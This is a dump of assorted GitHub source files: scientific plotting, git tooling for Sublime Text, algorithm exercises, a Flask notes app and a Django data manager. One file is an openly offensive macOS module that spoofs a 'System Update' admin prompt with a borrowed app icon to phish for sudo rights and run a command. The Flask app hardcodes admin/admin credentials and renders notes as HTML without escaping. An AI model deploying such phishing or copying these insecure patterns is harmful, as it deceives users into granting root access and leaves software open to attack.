displacement is the same as xx displacement \nand yx is the same as yy displacement\n\"\"\"\ndisp_xx = sum_xx/(a*len(init))\n#disp_xy = sum_xx/(a*len(init))\ndisp_yy = sum_yy/(a+len(init))\n#disp_yx = sum_yy/(a+len(init))\n\ndisplacement_tensor = [disp_xx,0,disp_yy,0]\ndisplacement_tensor_transpose = [disp_xx,0,disp_yy,0]\nstrain_tensor = []\n\nfor i in range(4):\n\tstrain_tensor = strain_tensor + [0.5*(displacement_tensor[i] + displacement_tensor_transpose[i])]\n\ntxt = 'epsilon_xx =' + str(round(strain_tensor[0],3))\n#txt_1 = 'epsilon_xy =' + str(round(strain_tensor[1],3))\ntxt_2 = 'epsilon_yy =' + str(round(strain_tensor[2],3))\n#txt_3 = 'epsilon_yx =' + str(round(strain_tensor[3],3))\n\n\nplt.figtext(0.67, 0.29, txt)\n#plt.figtext(0.67, 0.25, txt_1)\nplt.figtext(0.67, 0.21, txt_2)\n#plt.figtext(0.67, 0.17, txt_3)\n\nplt.show()\n\n\n","repo_name":"ankitkmr/Grain_Strain_Measurement","sub_path":"MSE313A_2.py","file_name":"MSE313A_2.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26866827491","text":"\"\"\"phishes for sudo with AppleScript\"\"\"\nimport json\nimport os\nimport plistlib\n\nfrom .general import (DEFAULT_COMMAND, app_installed, app_running, osascript,\n random_string)\n\ntry:\n input = raw_input\nexcept NameError:\n pass\n\nwith open(\"apps.json\") as json_file:\n APPS = json.load(json_file)\n\n__cve__ = \"\"\n__credits__ = \"thehappydinoa\"\n\n\ndef admin_prompt(app=None, icon_path=None, prompt=\"System Update\", command=\"echo hello\"):\n \"\"\"prompts with administrator privileges\"\"\"\n rand = random_string()\n print(\"\\nPrompting: \" + prompt)\n if app:\n if icon_path:\n app_path = \"Prompt.app\"\n zip_path = \"Prompt.app.zip\"\n if not os.path.exists(app_path) and os.path.exists(zip_path):\n os.system(\"unzip \" + zip_path)\n if os.path.exists(\"/Applications/\" + app):\n full_app_path = \"/Applications/\" + app\n else:\n full_app_path = \"~/Applications/\" + app\n plist = app_path + \"/Contents/Info.plist\"\n info = plistlib.readPlist(plist)\n info[\"CFBundleName\"] = prompt\n info[\"CFBundleIdentifier\"] = \"com.apple.ScriptEditor.id.\" + \\\n prompt.replace(\" \", \"\")\n plistlib.writePlist(info, plist)\n os.system(\n \"cp \\\"{icon_path}\\\" \\\"{app_path}/Contents/Resources/applet.icns\\\"; touch {app_path};\".format(icon_path=full_app_path + icon_path, app_path=app_path))\n payload = \"\"\"open {app_path} --args \"{command}; echo {success}\" \"{prompt}\" \"\"\".format(\n app_path=app_path, prompt=prompt, command=command.replace('\"', '\\\"'), success=rand)\n os.system(payload)\n print(\"Application Launched...\")\n return True\n else:\n payload = \"\"\"osascript <= r:\n cnt = 0\n for j in range(r):\n if arr[j] in st:\n cnt += 1\n if cnt >= 1 and r-cnt >= 2:\n print(''.join(arr))\n return\n for i in range(s, n-r+k+1):\n arr[k] = p[i]\n comb(n, r, k+1, i+1)\n\ncomb(C, L, 0, 0)","repo_name":"youngmin940629/AlgorithmStudy","sub_path":"알고리즘스터디/2021_11/1106/강민철/b1759_암호 만들기.py","file_name":"b1759_암호 만들기.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38311833378","text":"from functools import partial\n\nimport sublime\n\nfrom ...common import util\nfrom ..ui_mixins.quick_panel import show_branch_panel\nfrom ..ui_mixins.input_panel import show_single_line_input_panel\nfrom GitSavvy.core.base_commands import GsWindowCommand\nfrom GitSavvy.core.runtime import 
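# Aside: the loop over displacement_tensor above is the small-strain formula
# epsilon_ij = (du_i/dx_j + du_j/dx_i) / 2 written out element by element
# (with the shear terms zeroed in the script). With numpy the symmetrisation
# is a one-liner; the gradient values below are invented for illustration:
import numpy as np

grad_u = np.array([[0.012, 0.003],
                   [0.001, 0.020]])    # du_i/dx_j
strain = 0.5 * (grad_u + grad_u.T)     # symmetric small-strain tensor
print(strain)                          # off-diagonals average to 0.002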
enqueue_on_worker, run_on_new_thread\nfrom GitSavvy.core.utils import show_actions_panel, noop\nfrom GitSavvy.core import store\n\n\n__all__ = (\n \"gs_push\",\n \"gs_push_to_branch\",\n \"gs_push_to_branch_name\",\n)\n\n\nMYPY = False\nif MYPY:\n from typing import Dict, Sequence, TypeVar\n from GitSavvy.core.base_commands import Args, GsCommand, Kont\n T = TypeVar(\"T\")\n\n\nEND_PUSH_MESSAGE = \"Push complete.\"\nCONFIRM_FORCE_PUSH = (\"You are about to `git push {}`. Would you \"\n \"like to proceed?\")\n\n\nclass PushMixin(GsWindowCommand):\n def guess_remote_to_push_to(self, available_remotes):\n # type: (Sequence[str]) -> str\n if len(available_remotes) == 0:\n raise RuntimeError(\"\")\n if len(available_remotes) == 1:\n return next(iter(available_remotes))\n\n last_remote_used = store.current_state(self.repo_path).get(\"last_remote_used_for_push\")\n if last_remote_used in available_remotes:\n return last_remote_used # type: ignore[return-value]\n\n defaults = dict(\n (key[:-12], val) # strip trailing \".pushdefault\" from key\n for key, val in (\n line.split()\n for line in self.git(\n \"config\",\n \"--get-regexp\",\n r\".*\\.pushdefault\",\n throw_on_error=False\n ).splitlines()\n )\n ) # type: Dict[str, str]\n for key in (defaults.get(\"gitsavvy\"), defaults.get(\"remote\"), \"fork\", \"origin\"):\n if key in available_remotes:\n return key # type: ignore[return-value]\n return next(iter(available_remotes))\n\n def do_push(\n self,\n remote,\n branch,\n force=False,\n force_with_lease=False,\n remote_branch=None,\n set_upstream=False\n ):\n # type: (str, str, bool, bool, str, bool) -> None\n \"\"\"\n Perform `git push remote branch`.\n \"\"\"\n if self.savvy_settings.get(\"confirm_force_push\", True):\n if force:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force\")):\n return\n elif force_with_lease:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force-with-lease\")):\n return\n\n self.window.status_message(\"Pushing {} to {}...\".format(branch, remote))\n self.push(\n remote,\n branch,\n remote_branch=remote_branch,\n force=force,\n force_with_lease=force_with_lease,\n set_upstream=set_upstream\n )\n self.window.status_message(END_PUSH_MESSAGE)\n util.view.refresh_gitsavvy_interfaces(self.window)\n\n\nclass gs_push(PushMixin):\n \"\"\"\n Push current branch.\n \"\"\"\n\n def run(self, local_branch_name=None, force=False, force_with_lease=False):\n # type: (str, bool, bool) -> None\n if local_branch_name:\n local_branch = self.get_local_branch_by_name(local_branch_name)\n if not local_branch:\n sublime.message_dialog(\"'{}' is not a local branch name.\")\n return\n else:\n local_branch = self.get_current_branch()\n if not local_branch:\n sublime.message_dialog(\"Can't push a detached HEAD.\")\n return\n\n upstream = local_branch.upstream\n if upstream:\n remote, remote_branch = upstream.remote, upstream.branch\n kont = partial(\n enqueue_on_worker,\n self.do_push,\n remote,\n local_branch.name,\n remote_branch=remote_branch,\n force=force,\n force_with_lease=force_with_lease\n )\n if not force and not force_with_lease and \"behind\" in upstream.status:\n show_actions_panel(self.window, [\n noop(\n \"Abort, '{}' is behind '{}/{}'.\"\n .format(local_branch.name, remote, remote_branch)\n ),\n (\n \"Forcefully push.\",\n partial(kont, force_with_lease=True)\n )\n ])\n return\n else:\n kont()\n\n else:\n self.window.run_command(\"gs_push_to_branch_name\", {\n \"local_branch_name\": local_branch.name,\n \"set_upstream\": True,\n \"force\": 
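# Aside: the `defaults` comprehension in guess_remote_to_push_to above parses
# `git config --get-regexp` output ("section.pushdefault value" per line) into
# a {section: value} dict by slicing off the 12-character ".pushdefault"
# suffix. The same parse over canned output (sample text invented):
sample = "remote.pushdefault origin\ngitsavvy.pushdefault fork"

defaults = dict(
    (key[:-len(".pushdefault")], val)
    for key, val in (line.split() for line in sample.splitlines())
)
print(defaults)   # {'remote': 'origin', 'gitsavvy': 'fork'}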
force,\n \"force_with_lease\": force_with_lease\n })\n\n\ndef take_current_branch_name(cmd, args, done):\n # type: (GsWindowCommand, Args, Kont) -> None\n current_branch_name = cmd.get_current_branch_name()\n if current_branch_name:\n done(current_branch_name)\n else:\n cmd.window.status_message(\"Can't push a detached HEAD.\")\n\n\ndef ask_for_remote(cmd, args, done):\n # type: (PushMixin, Args, Kont) -> None\n available_remotes = list(cmd.get_remotes())\n if len(available_remotes) == 0:\n show_actions_panel(cmd.window, [noop(\"There are no remotes available.\")])\n return\n\n remote = cmd.guess_remote_to_push_to(available_remotes)\n current_branch_name = args[\"local_branch_name\"]\n\n show_actions_panel(cmd.window, [\n (\n \"Push to '{}/{}'\".format(remote, current_branch_name),\n lambda: done(remote, branch_name=current_branch_name)\n ),\n (\n \"Configure where to push to...\",\n lambda: (\n show_actions_panel(\n cmd.window,\n [\n (r, partial(done, r, remember_used_remote=True))\n for r in available_remotes\n ],\n select=available_remotes.index(remote)\n )\n if len(available_remotes) > 1\n else done(remote)\n )\n ),\n ])\n\n\ndef ask_for_branch_name(caption, initial_text):\n def handler(cmd, args, done):\n # type: (GsCommand, Args, Kont) -> None\n show_single_line_input_panel(\n caption(args),\n initial_text(args),\n done\n )\n return handler\n\n\ndef ask_for_remote_branch(self, args, done):\n # type: (GsCommand, Args, Kont) -> None\n show_branch_panel(done, ask_remote_first=True)\n\n\nclass gs_push_to_branch_name(PushMixin):\n \"\"\"\n Prompt for remote and remote branch name, then push.\n \"\"\"\n defaults = {\n \"local_branch_name\": take_current_branch_name,\n \"remote\": ask_for_remote,\n \"branch_name\": ask_for_branch_name(\n caption=lambda args: \"Push to {}/\".format(args[\"remote\"]),\n initial_text=lambda args: args[\"local_branch_name\"]\n )\n }\n\n def run(\n self,\n local_branch_name,\n remote,\n branch_name,\n set_upstream=False,\n force=False,\n force_with_lease=False,\n remember_used_remote=False,\n ):\n # type: (str, str, str, bool, bool, bool, bool) -> None\n if remember_used_remote:\n run_on_new_thread(self.git, \"config\", \"--local\", \"gitsavvy.pushdefault\", remote)\n store.update_state(self.repo_path, {\"last_remote_used_for_push\": remote})\n\n enqueue_on_worker(\n self.do_push,\n remote,\n local_branch_name,\n remote_branch=branch_name,\n force=force,\n force_with_lease=force_with_lease,\n set_upstream=set_upstream\n )\n\n\nclass gs_push_to_branch(PushMixin):\n \"\"\"\n Through a series of panels, allow the user to push to a specific remote branch.\n \"\"\"\n defaults = {\n \"local_branch_name\": take_current_branch_name,\n \"remote_branch\": ask_for_remote_branch\n }\n\n def run(self, local_branch_name, remote_branch):\n # type: (str, str) -> None\n remote, branch_name = remote_branch.split(\"/\", 1)\n enqueue_on_worker(\n self.do_push,\n remote,\n local_branch_name,\n remote_branch=branch_name\n )\n","repo_name":"timbrel/GitSavvy","sub_path":"core/commands/push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":8418,"program_lang":"python","lang":"en","doc_type":"code","stars":1895,"dataset":"github-code","pt":"3"} +{"seq_id":"35385670130","text":"import sqlite3\nimport re\nfrom flask import Flask, request, session, g, \\\n redirect, url_for, render_template\nfrom contextlib import closing\n\n# configuration\nDATABASE = 'database.db'\nDEBUG = True\nSECRET_KEY = 'RGINQ4T348TB8GQ'\nUSERNAME = 'admin'\nPASSWORD = 'admin'\n\napp = 
Flask(__name__)\napp.config.from_object(__name__)\n\n####### Database\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n#######\n\n@app.route(\"/\", methods=['GET','POST'])\ndef index():\n if request.method == 'POST':\n results = g.db.execute('SELECT * FROM notes WHERE TITLE LIKE ? OR DESCRIPTION LIKE ? ORDER BY TITLE', \\\n ['%'+request.form['search']+'%', '%'+request.form['search']+'%'])\n else:\n results = g.db.execute('SELECT * FROM notes ORDER BY TITLE ')\n notes=[]\n for row in results:\n new_row=[]\n for column in range(len(row)):\n if column == 2:\n new_row.append(markup(row[column]))\n else:\n new_row.append(row[column])\n notes.append(new_row)\n return render_template('index.html', notes=notes)\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n if request.form['username'] == app.config['USERNAME']:\n if request.form['password'] == app.config['PASSWORD']:\n session['logged_in'] = True\n return redirect(url_for('index'))\n\n@app.route(\"/logout\")\ndef logout():\n session.pop('logged_in', None)\n session.pop('username', None)\n return redirect(url_for('index'))\n\n@app.route('/edit/', methods=['GET','POST'])\ndef edit(index):\n if request.method == 'POST':\n g.db.execute(\"UPDATE notes SET TITLE=?,DESCRIPTION=?,TSTAMP=CURRENT_TIMESTAMP WHERE ID=?\", [request.form['title'],request.form['description'],index])\n g.db.commit()\n return redirect(url_for('index'))\n else:\n results = g.db.execute(\"SELECT TITLE, DESCRIPTION FROM notes WHERE ID=?\", [index])\n return render_template(\"edit.html\", notes=results)\n\n@app.route(\"/view/\")\ndef view(index):\n results = g.db.execute(\"SELECT * FROM notes WHERE ID=?\", [index])\n notes=[]\n for row in results:\n new_row=[]\n for column in range(len(row)):\n if column == 2:\n new_row.append(markup(row[column]))\n else:\n new_row.append(row[column])\n notes.append(new_row)\n return render_template(\"view.html\", notes=notes)\n\n@app.route(\"/add\", methods=['POST'])\ndef add():\n title, description = request.form['title'], request.form['description']\n g.db.execute(\"INSERT INTO notes (TITLE, DESCRIPTION) VALUES (?, ?)\", [title, description])\n g.db.commit()\n return redirect(url_for('index'))\n\n@app.route(\"/delete/\")\ndef delete(index):\n g.db.execute(\"DELETE FROM notes WHERE ID=?\", [index])\n g.db.commit()\n return redirect(url_for('index'))\n\ndef markup(content):\n new_content = []\n is_fixed = False\n is_list = False\n for line in content.splitlines():\n if line.startswith(\"*#BEGIN_FIXED\"):\n is_fixed = True\n line = \"
<pre>\n\"+line[13:]\n        elif line.endswith(\"*#END_FIXED\"):\n            is_fixed = False\n            line = line[:len(line)-11]+\"</pre>\"\n        elif is_fixed:\n            new_content.append(line)\n            continue\n\n        if line.startswith(\"-\"):\n            if not is_list:\n                new_content.append(\"<ul>\")\n                is_list = True\n            line = \"<li>\"+line[1:]+\"</li>\"\n        elif is_list:\n            is_list = False\n            new_content.append(\"</ul>\")\n\n        if line.startswith(\"**\"):\n            line = \"<h2>\"+line[2:]+\"</h2>\"\n        elif line.startswith(\"*\"):\n            line = \"<h1>\"+line[1:]+\"</h1>\"\n\n        line = re.sub(r'\[\[(.*)\]\]',r'<a href=\"\1\">\1</a>',line)\n\n        new_content.append(line)\n    return \"\n\".join(new_content)\n\n\n\nif __name__ == \"__main__\":\n    init_db()\n    app.run()\n\n#TODO: Search symbol","repo_name":"CruskitKing/Massey-Work","sub_path":"159.352/352-Ass2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"40077038272","text":"# Calculate the sum of all numbers from 1 to a given number\ndef sum(num):\n    sum = 0\n    for i in range(1, num + 1):\n        sum += i\n\n    print(sum)\n\nnum = int(input(\"enter a number: \"))\n\nsum(num)","repo_name":"mbclause/Python-Exercises","sub_path":"control flow exercises/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18334314431","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(100000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n    N = NI()\n    A = NLI()\n\n    S = sum(A)\n    if S % 10:\n        print(\"No\")\n        exit()\n\n    X = S // 10\n\n    AA = A + A\n    que = deque()\n    now = 0\n    for a in AA:\n        while que and now > X:\n            d = que.popleft()\n            now -= d\n\n        if now < X:\n            que.append(a)\n            now += a\n\n        if now == X:\n            print(\"Yes\")\n            exit()\n\n    print(\"No\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"tenkei90/tenkei90_076.py","file_name":"tenkei90_076.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20725339676","text":"from server.database import get_collection\nfrom typing import Optional\nimport bson\n\nimage_collection = get_collection('docesWebApi', 'images')\n\n# Helpers\ndef images_helper(image) -> dict:\n    return {\n        \"page\": image[\"page\"],\n        \"name\": image[\"name\"],\n        \"image\": image[\"image\"],\n        \"path\": image[\"path\"],\n    }\n\ndef encode_utf(string: str) -> str:\n    return string.encode()\n\n# CRUD\n\nasync def add_new_image(image_data: dict) -> dict:\n    new_data = {\n        \"page\": image_data[\"page\"],\n        \"name\": image_data[\"name\"],\n        \"image\": image_data[\"image\"],\n        \"path\": image_data[\"path\"],\n    }\n    image = await image_collection.insert_one(new_data)\n    new_image = await image_collection.find_one({\"_id\": image.inserted_id})\n    if new_image:\n        return images_helper(new_image)\n    return None\n\nasync def get_all_images_in_page(page: str) -> list:\n    list_images = []\n    async for image in image_collection.find({\"page\": page}):\n        list_images.append(images_helper(image))\n    return list_images\n\nasync def get_image_by_name(page: str, name: str) -> dict:\n    page = encode_utf(page)\n    name = encode_utf(name)\n    image = await image_collection.find_one({\"page\": page, \"name\": name})\n    if image:\n        return images_helper(image)\n    return None\n\nasync def get_image_by_name_and_image(page: str, name: str, image:str) -> dict:\n    page = encode_utf(page)\n    name = encode_utf(name)\n    image = encode_utf(image)\n    image = await image_collection.find_one({\"page\": page , \"name\": name, \"image\": image})\n    if image:\n        return images_helper(image)\n    return
None\n","repo_name":"renatohkuramoto/docesWebApi","sub_path":"server/collections/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37518713865","text":"from __future__ import unicode_literals, absolute_import, print_function\n\nfrom twisted.internet import defer\nfrom txmsgpackrpc.client import connect\n\nfrom pprint import pformat\n\n@defer.inlineCallbacks\ndef call_get_schedule(uuid, num):\n\tprint(\"Getting schedule for uuid: {}\".format(uuid))\n\ttry:\n\t\tc = yield connect('localhost', 18080, connectTimeout=5, waitTimeout=5)\n\n\t\tdata = {\n\t\t\t'uuid':uuid,\n\t\t\t'num':num\n\t\t}\n\n\t\tres = yield c.createRequest('get_schedule', data)\n\t\tc.disconnect()\n\t\tdefer.returnValue(res)\n\texcept Exception as e:\n\t\tdefer.returnValue(e)\n\n@defer.inlineCallbacks\ndef main(uuid, num):\n\n\tfrom cheesepi.server.storage.models.target import Target\n\n\tresult = yield call_get_schedule(uuid, num)\n\n\tschedule = []\n\tif result['status'] == 'success':\n\t\tfor s in result['result']:\n\t\t\tschedule.append(Target.fromDict(s))\n\telse:\n\t\tprint(\"Fail.. :(\")\n\n\tprint(schedule)\n\n\tprint(pformat(result))\n\n\treactor.stop()\n\nif __name__ == \"__main__\":\n\timport argparse\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--uuid', type=str,\n\t\thelp=\"The uuid of the node to get the schedule for\")\n\tparser.add_argument('--num', type=int, default=1,\n\t\thelp=\"The length of the schedule\")\n\n\targs = parser.parse_args()\n\n\tif args.uuid is not None:\n\t\tfrom twisted.internet import reactor\n\n\t\treactor.callWhenRunning(main, args.uuid, args.num)\n\t\treactor.run()\n\telse:\n\t\tprint(\"No uuid specified.\")\n","repo_name":"liamjjmcnamara/cheesepi","sub_path":"cheesepi/tests/test_get_schedule.py","file_name":"test_get_schedule.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"15931985560","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import View, FormView, TemplateView\nfrom . 
import forms\nimport ujson as json\nimport requests\n\n\nAPI_ROOT = '/api/v1/'\n\n\nclass ShareaboutsApi (object):\n uri_templates = {\n 'password': r'{username}/password',\n 'dataset_collection': r'{username}/datasets/',\n 'dataset_instance': r'{username}/datasets/{slug}/',\n 'keys_collection': r'{username}/datasets/{dataset_slug}/keys/',\n 'place_collection': r'{username}/datasets/{dataset_slug}/places/?include_invisible=true&include_private_data=true',\n 'place_collection_table': r'{username}/datasets/{dataset_slug}/places/table?include_invisible=true&include_private_data=true',\n 'place_instance': r'{username}/datasets/{dataset_slug}/places/{pk}/?include_private_data=true',\n 'submission_collection': r'{username}/datasets/{dataset_slug}/places/{place_pk}/{type}/?include_invisible=true&include_private_data=true',\n 'submission_instance': r'{username}/datasets/{dataset_slug}/places/{place_pk}/{type}/{pk}/?include_private_data=true',\n 'all_submissions': r'{username}/datasets/{dataset_slug}/{type}/?include_private_data=true',\n 'all_submissions_table': r'{username}/datasets/{dataset_slug}/{type}/table?include_private_data=true',\n }\n\n def __init__(self, request=None, root='/api/v1/'):\n if request:\n self.uri_root = request.build_absolute_uri(root)\n else:\n self.uri_root = root\n\n def __unicode__(self):\n return ''.format(self.uri_root)\n\n def build_uri(self, name, *args, **kwargs):\n uri_template = self.uri_templates[name]\n uri_path = uri_template.format(*args, **kwargs)\n return (self.uri_root + uri_path)\n\n def authenticate(self, request):\n self.csrf_token = request.META.get('CSRF_COOKIE', '')\n self.cookies = request.META.get('HTTP_COOKIE', '')\n\n def send(self, method, url, data=None, content_type='application/json'):\n if data is not None and content_type == 'application/json':\n data = json.dumps(data)\n\n headers = {'Content-type': content_type,\n 'Accept': content_type}\n\n # Set authentication headers\n if hasattr(self, 'csrf_token') and hasattr(self, 'cookies'):\n headers.update({\n 'Cookie': self.cookies,\n 'X-CSRFToken': self.csrf_token\n })\n\n # Explicitly set the content length for delete\n if method == 'DELETE':\n headers.update({'Content-Length': '0'})\n\n # Add/update all data silently (do not generate activity)\n headers.update({'X-Shareabouts-Silent': 'True'})\n\n response = requests.request(method, url, data=data, headers=headers)\n return response\n\n def get(self, url, default=None):\n \"\"\"\n Returns decoded data from a GET request, or default on non-200\n responses.\n \"\"\"\n res = self.send('GET', url)\n res_json = res.text\n return (json.loads(res_json) if res.status_code == 200 else default)\n\n\n@login_required\ndef index_view(request):\n return redirect(reverse('manager_dataset_list', args=[request.user.username]))\n\n\n@login_required\ndef places_view(request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset_uri = api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n places_uri = api.build_uri('place_collection', username=owner_name, dataset_slug=dataset_slug)\n\n places = api.get(places_uri)\n dataset = api.get(dataset_uri)\n\n data_fields = set()\n for place in places:\n for field_name in place:\n data_fields.add(field_name)\n data_fields -= set(['id', 'submissions', 'dataset', 'url', 'location',\n 'visible', 'created_datetime', 'updated_datetime'])\n\n for place in places:\n place['submission_count'] = sum([s['length'] for s in place['submissions']])\n\n return 
render(request, \"manager/places.html\", {'places': places,\n 'dataset': dataset,\n 'data_fields': data_fields})\n\n\n@login_required\ndef keys_view(request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset_uri = api.build_uri('dataset_instance',\n username=owner_name,\n slug=dataset_slug)\n keys_uri = api.build_uri('keys_collection',\n username=owner_name,\n dataset_slug=dataset_slug)\n keys = api.get(keys_uri)\n dataset = api.get(dataset_uri)\n return render(request, \"manager/keys.html\", {'keys': keys,\n 'dataset': dataset})\n\n\nclass BaseDataBlobMixin (object):\n def make_data_fields_tuples(self, data):\n \"\"\"\n Take a dictionary of data and turn it into tuples containing a label, a\n key and a value. Reqires special_fields to be defined on the view.\n\n \"\"\"\n data_fields = []\n for key, value in data.items():\n if key not in self.special_fields:\n label = key.replace('_', ' ').title()\n data_fields.append((label, key, value))\n data_fields.sort()\n\n return data_fields\n\n\nclass BaseDataBlobFormMixin (BaseDataBlobMixin):\n def process_new_attr(self, num):\n data = self.data_blob\n\n meta_key = '_new_key{0}'.format(num)\n meta_val = '_new_val{0}'.format(num)\n\n new_key = data.get(meta_key, '').strip()\n new_val = data.get(meta_val, '')\n\n if meta_key in data:\n del data[meta_key]\n if meta_val in data:\n del data[meta_val]\n\n if new_key and new_val:\n data[new_key] = new_val\n\n return new_key, new_val\n\n def eliminate_unwanted_fields(self):\n \"\"\"\n Pull data out of the blob that we don't want to send to the Shareabouts\n service server.\n \"\"\"\n data = self.data_blob\n if 'csrfmiddlewaretoken' in data:\n del data['csrfmiddlewaretoken']\n if 'action' in data:\n del data['action']\n\n def process_specific_fields(self):\n \"\"\"\n Override this in the child view to do any extra processing necessary.\n \"\"\"\n raise NotImplementedError()\n\n def check_for_new_fields(self):\n data = self.data_blob\n\n for key, value in data.items():\n # Get rid of any empty data\n if value == '':\n del data[key]\n continue\n\n # Add any new keys to the data dictionary\n if key.startswith('_new_key'):\n num = key[8:]\n self.process_new_attr(num)\n continue\n\n def process_data_blob(self):\n \"\"\"\n Prepare place data to be sent to the service for creating or updating.\n \"\"\"\n self.eliminate_unwanted_fields()\n self.process_specific_fields()\n self.check_for_new_fields()\n\n\nclass PlaceFormMixin (BaseDataBlobFormMixin):\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n self.special_fields = ('id', 'location', 'submitter_name', 'name',\n 'created_datetime', 'updated_datetime', 'url',\n 'visible', 'submissions', 'dataset', 'attachments')\n return super(PlaceFormMixin, self).dispatch(request, *args, **kwargs)\n\n def process_specific_fields(self):\n data = self.data_blob\n\n # Fix the location to be something the server will understand\n location = {\n 'lat': data.get('lat'),\n 'lng': data.get('lng')\n }\n del data['lat']\n del data['lng']\n data['location'] = location\n\n # Fix the visibility to be either true or false (boolean)\n data['visible'] = ('visible' in data)\n\n def initial(self, request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset = api.get(self.dataset_uri)\n return render(request, \"manager/place.html\", {'dataset': dataset})\n\n def create(self, request, owner_name, dataset_slug):\n # Make a copy of the POST data, since we can't edit the 
original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('POST', self.places_uri, data)\n\n if response.status_code == 201:\n data = json.loads(response.text)\n place_id = data.get('id')\n\n messages.success(request, 'Successfully saved!')\n return redirect(reverse('manager_place_detail', args=[owner_name, dataset_slug, place_id]))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n def read(self, request, owner_name, dataset_slug, pk):\n # Retrieve the place data.\n place = self.api.get(self.place_uri)\n dataset = self.api.get(self.dataset_uri)\n\n # Arrange the place data fields for display on the form\n data_fields = self.make_data_fields_tuples(place)\n\n return render(request, \"manager/place.html\", {\n 'place': place,\n 'dataset': dataset,\n 'data_fields': data_fields\n })\n\n def update(self, request, owner_name, dataset_slug, pk):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('PUT', self.place_uri, data)\n\n if response.status_code == 200:\n messages.success(request, 'Successfully saved!')\n\n else:\n messages.error(request, 'Error: ' + response.text)\n\n return redirect(request.get_full_path())\n\n def delete(self, request, owner_name, dataset_slug, pk):\n # Send the delete request\n response = self.api.send('DELETE', self.place_uri)\n\n if response.status_code == 204:\n messages.success(request, 'Successfully deleted!')\n return redirect(reverse('manager_place_list', args=[owner_name, dataset_slug]))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n\nclass NewPlaceView (PlaceFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n self.places_uri = self.api.build_uri('place_collection', username=owner_name, dataset_slug=dataset_slug)\n\n return super(NewPlaceView, self).dispatch(request, owner_name, dataset_slug)\n\n def get(self, request, owner_name, dataset_slug):\n return self.initial(request, owner_name, dataset_slug)\n\n def post(self, request, owner_name, dataset_slug):\n return self.create(request, owner_name, dataset_slug)\n\n\nclass ExistingPlaceView (PlaceFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, pk):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n self.place_uri = self.api.build_uri('place_instance', username=owner_name, dataset_slug=dataset_slug, pk=pk)\n\n return super(ExistingPlaceView, self).dispatch(request, owner_name, dataset_slug, pk)\n\n def get(self, request, owner_name, dataset_slug, pk):\n return self.read(request, owner_name, dataset_slug, pk)\n\n def post(self, request, owner_name, dataset_slug, pk):\n if request.POST.get('action') == 'save':\n return self.update(request, owner_name, dataset_slug, pk)\n elif request.POST.get('action') == 'delete':\n return self.delete(request, owner_name, dataset_slug, pk)\n else:\n # TODO ???\n pass\n\n\nclass ChangePasswordView (FormView):\n template_name = 
